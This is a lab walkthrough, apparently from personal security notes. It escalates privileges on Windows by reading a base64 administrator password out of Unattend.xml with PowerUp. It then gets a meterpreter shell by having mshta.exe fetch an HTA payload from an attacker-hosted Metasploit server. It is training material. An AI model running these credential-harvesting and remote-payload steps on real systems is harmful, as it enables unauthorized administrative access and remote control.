Unattended Installation

Lab Environment

In this lab environment, you will be provided with GUI access to a Kali machine and a Windows machine.

Your task is to run PowerUp.ps1 Powershell script to find a common Windows privilege escalation flaw that depends on misconfigurations. The PowerSploit post-exploitation framework has been provided to you on the Windows machine.

Objective: Gain access to meterpreter session with high privilege.

Tools

The best tools for this lab are:

PowerUp.ps1
Metasploit Framework
Powershell

Writeup

cd .\Desktop\PowerSploit\Privesc\

powershell -ep bypass
. .\PowerUp.ps1
Invoke-PrivescAudit

cat C:\Windows\Panther\Unattend.xml

$password='QWRtaW5AMTIz'
$password=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($password))
echo $password

runas.exe /user:administrator cmd
Admin@123
whoami

Persistencia

msfconsole -q
use exploit/windows/misc/hta_server
exploit

mshta.exe http://10.10.31.2:8080/Bn75U0NL8ONS.hta

sessions -i 1
cd /
cd C:\\Users\\Administrator\\Desktop
dir
cat flag.txt

PreviousPrivilege Escalation: Impersonate NextWindows: Meterpreter: Kiwi Extension

Last updated 5 months ago